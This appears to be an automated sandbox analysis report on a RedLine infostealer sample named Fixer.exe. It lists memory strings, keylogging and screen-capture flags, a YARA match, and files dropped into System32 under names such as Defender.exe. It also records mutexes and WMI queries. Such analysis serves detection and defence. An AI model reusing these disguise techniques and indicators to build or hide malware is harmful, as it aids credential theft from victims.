                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52600457326.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: FixerNerest.exe, 00000003.00000002.52862644095.000000001BE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52856212336.000000001B4F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmC:
                      Source: Fixer.exeString found in binary or memory: https://api.ip.sb/ip
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52853936146.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab0
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Defender.exe.3.dr, FixerNerest.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E84000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.cs, .Net Code: kgykxlqrmnxrTJvFK
                      Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.cs, .Net Code: zZqXIBvmIbEvDhSnLgO
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, BeNEQBpvCUYMUQvO.cs, .Net Code: kgykxlqrmnxrTJvFK
                      Source: Defender.exe.3.dr, QEEFRJhvySTxMB.cs, .Net Code: zZqXIBvmIbEvDhSnLgO

                      System Summary

                      Source: Fixer.exe, type: SAMPLE, Matched rule: Finds Redline samples based on characteristic strings, Author: Sekoia.io
                      Source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPE, Matched rule: Finds Redline samples based on characteristic strings, Author: Sekoia.io
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File dump: xdwdSecurityHealthSystrays.exe.2.dr 735522883
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, File dump: Defender.exe.3.dr 753276147
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, Code function: 2_2_00007FFA1B3CD080 NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, Code function: 3_2_00007FFA1B3E17CD NtProtectVirtualMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe, Code function: 13_2_00007FFA1B3AD080 NtProtectVirtualMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe, Code function: 19_2_00007FFA1B3AD080 NtProtectVirtualMemory
                      Source: C:\Windows\System32\Defender.exe, Code function: 20_2_00007FFA1B3D17CD NtProtectVirtualMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe, Code function: 21_2_00007FFA1B3AD080 NtProtectVirtualMemory
                      Source: C:\Windows\System32\Defender.exe, Code function: 22_2_00007FFA1B3A17CD NtProtectVirtualMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe, Code function: 23_2_00007FFA1B3DD080 NtProtectVirtualMemory
                      Source: C:\Windows\System32\Defender.exe, Code function: 24_2_00007FFA1B3B17CD NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, File created: C:\Windows\xdwd.dll
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, File created: C:\Windows\System32\Defender.exe
                      Source: C:\Windows\System32\Defender.exeCode function: 20_2_00007FFA1B3CF98020_2_00007FFA1B3CF980
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AC83221_2_00007FFA1B3AC832
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B1C8C21_2_00007FFA1B3B1C8C
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AD07821_2_00007FFA1B3AD078
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AEB0421_2_00007FFA1B3AEB04
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3A7F3021_2_00007FFA1B3A7F30
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3A622021_2_00007FFA1B3A6220
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3ABA8621_2_00007FFA1B3ABA86
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3AE28E21_2_00007FFA1B3AE28E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B0A4721_2_00007FFA1B3B0A47
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B267921_2_00007FFA1B3B2679
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B351D21_2_00007FFA1B3B351D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3ADD2021_2_00007FFA1B3ADD20
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B353121_2_00007FFA1B3B3531
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3A518021_2_00007FFA1B3A5180
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B275F21_2_00007FFA1B3B275F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B1DD721_2_00007FFA1B3B1DD7
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B3E9E21_2_00007FFA1B3B3E9E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3B410F21_2_00007FFA1B3B410F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 21_2_00007FFA1B3ADCE921_2_00007FFA1B3ADCE9
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39C7E622_2_00007FFA1B39C7E6
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39833A22_2_00007FFA1B39833A
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39D59222_2_00007FFA1B39D592
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39ED4922_2_00007FFA1B39ED49
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39605822_2_00007FFA1B396058
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3A0F8D22_2_00007FFA1B3A0F8D
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3A234222_2_00007FFA1B3A2342
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39522822_2_00007FFA1B395228
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B398DE922_2_00007FFA1B398DE9
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B3955DA22_2_00007FFA1B3955DA
                      Source: C:\Windows\System32\Defender.exeCode function: 22_2_00007FFA1B39F98022_2_00007FFA1B39F980
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DC83223_2_00007FFA1B3DC832
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E1C8C23_2_00007FFA1B3E1C8C
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E0C4D23_2_00007FFA1B3E0C4D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DD07823_2_00007FFA1B3DD078
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DEB0423_2_00007FFA1B3DEB04
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D7F3023_2_00007FFA1B3D7F30
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E420D23_2_00007FFA1B3E420D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DBA8623_2_00007FFA1B3DBA86
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DE28E23_2_00007FFA1B3DE28E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E267923_2_00007FFA1B3E2679
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DDD2023_2_00007FFA1B3DDD20
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E351D23_2_00007FFA1B3E351D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D518023_2_00007FFA1B3D5180
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E102E23_2_00007FFA1B3E102E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D03C823_2_00007FFA1B3D03C8
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D03D823_2_00007FFA1B3D03D8
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E275F23_2_00007FFA1B3E275F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D622023_2_00007FFA1B3D6220
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E1DD723_2_00007FFA1B3E1DD7
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E3E9E23_2_00007FFA1B3E3E9E
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E0A3D23_2_00007FFA1B3E0A3D
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3E410F23_2_00007FFA1B3E410F
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3DDCE923_2_00007FFA1B3DDCE9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeCode function: 23_2_00007FFA1B3D0D6D23_2_00007FFA1B3D0D6D
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AC7E624_2_00007FFA1B3AC7E6
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A833A24_2_00007FFA1B3A833A
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AD59224_2_00007FFA1B3AD592
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B254824_2_00007FFA1B3B2548
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AED4924_2_00007FFA1B3AED49
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A605824_2_00007FFA1B3A6058
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B2B0224_2_00007FFA1B3B2B02
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B0F8D24_2_00007FFA1B3B0F8D
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A8B5624_2_00007FFA1B3A8B56
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B260A24_2_00007FFA1B3B260A
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A522824_2_00007FFA1B3A5228
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3A55DA24_2_00007FFA1B3A55DA
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3B264624_2_00007FFA1B3B2646
                      Source: C:\Windows\System32\Defender.exeCode function: 24_2_00007FFA1B3AF98024_2_00007FFA1B3AF980
                      Source: Fixer.exe, 00000000.00000002.52599130900.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSecurityHealthSystrayj% vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameexplorerr) vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000000.52343916297.00000000006B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs Fixer.exe
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs Fixer.exe
                      Source: Fixer.exeBinary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                      Source: Fixer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Fixer.exe, type: SAMPLEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.GetAccessControl
                      Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.SetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, sMngcJoYCfD.csSecurity API names: File.GetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, sMngcJoYCfD.csSecurity API names: File.SetAccessControl
                      Source: Defender.exe.3.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.GetAccessControl
                      Source: Defender.exe.3.dr, WpAqmEEzEwNIXIzRzOYiu.csSecurity API names: File.SetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YCqdhaRTimJInloXKuRkyyz.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csSecurity API names: File.GetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csSecurity API names: File.SetAccessControl
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.GetAccessControl
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.SetAccessControl
                      Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csSecurity API names: File.GetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csSecurity API names: File.SetAccessControl
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.GetAccessControl
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csSecurity API names: File.SetAccessControl
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: Defender.exe.3.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Defender.exe.3.dr, tisnIiXyTCXvDDO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: File.GetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: File.SetAccessControl
                      Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@36/7@1/2
                      Source: C:\Users\user\Desktop\Fixer.exe File created: C:\Users\user\AppData\Local\SystemCache
                      Source: C:\Windows\System32\Defender.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
                      Source: C:\Windows\System32\Defender.exeMutant created: \Sessions\1\BaseNamedObjects\kkepmy41u(qg%$l6
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                      Source: C:\Users\user\Desktop\Fixer.exe File created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                      Source: Fixer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Fixer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
